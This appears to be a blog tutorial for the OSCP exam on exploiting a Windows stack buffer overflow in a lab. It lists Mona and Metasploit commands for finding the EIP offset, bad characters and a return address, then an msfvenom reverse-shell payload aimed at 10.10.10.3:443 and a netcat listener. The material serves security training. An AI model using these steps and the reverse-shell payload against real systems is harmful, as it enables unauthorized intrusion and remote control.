In this small article, I would like to describe the main steps in the most straightforward words and provide a short overview of “how the buffer overflow” might be done. You should be ready to solve this type of task for the OSCP exam.
What you will have to work with during this task:
- Python exploit code
- Immunity debugger
- Mona for Immunity debugger
Main steps:
- Connection to the Debugging machine
- Fuzzing(Skip for OSCP)
- Identifying the EIP register offset value
- Controlling the EIP value
- Identifying the bad character
- Identifying the returning address
- Adding padding
- Generation a reverse shell with msfvenom
- Getting a shell
Steps overview:
1)Connection to the Debugging machine
xfreerdp +clipboard /u:USERNAME /p:PASSWORD /cert:ignore /v:MACHINE_IP /workarea
3)Identifying the EIP register offset value
Note: Generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server. VALUE = CRASH + 400
locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l VALUE
Set up Mona folder
!mona config -set workingfolder c:\mona\%p
Find EIP offset
!mona findmsp -distance VALUE
Mona result
Add it as offset value
4)Controlling the EIP value
Add the “BBBB” as the “retn” value. Then check the EIP register value.
Exploit
Result
5)Identifying the bad character
Note: the \x00 is a bad character by default. User the following string as a payload for identifying the bad characters.
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
Exploit
Set up the mona bytearray
!mona bytearray -b “\x00”
ESP register value after crash
Mona
!mona compare -f C:\mona\oscp\bytearray.bin -a ESP_ADRESS
Remove the bad char, crash again, add the removed char to mona byte array
!mona bytearray -b “\x00\x07”
Compare after crash the mona bytearray with ESP register value
Remove char
Note: you should remove all possibly bad char one by one. In the end you will have the list of bad char. For example, “\x00\x07\x2e\xa0”
6)Identifying the returning address
!mona jmp -r esp -cpb “\x00\x07\x2e\xa0”
So we have the “0x625011af” value
Convert the returning address value to which we can use in our Python code
0x625011af → \xaf\x11\x50\x62
7) Adding padding
padding = b”\x90" * 16
8) Generation a reverse shell with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT EXITFUNC=thread -b “BAD_CHAR” -f python -v payload
Example
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.3 LPORT=443 EXITFUNC=thread -b “\x00\x07\x2e\xa0” -f python -v payload
Put the exploit code as a Payload to the final exploit
9)Getting a shell
Start NC
sudo nc -lvnp 443
Run exploit and get a shell
Follow me and stay secure!
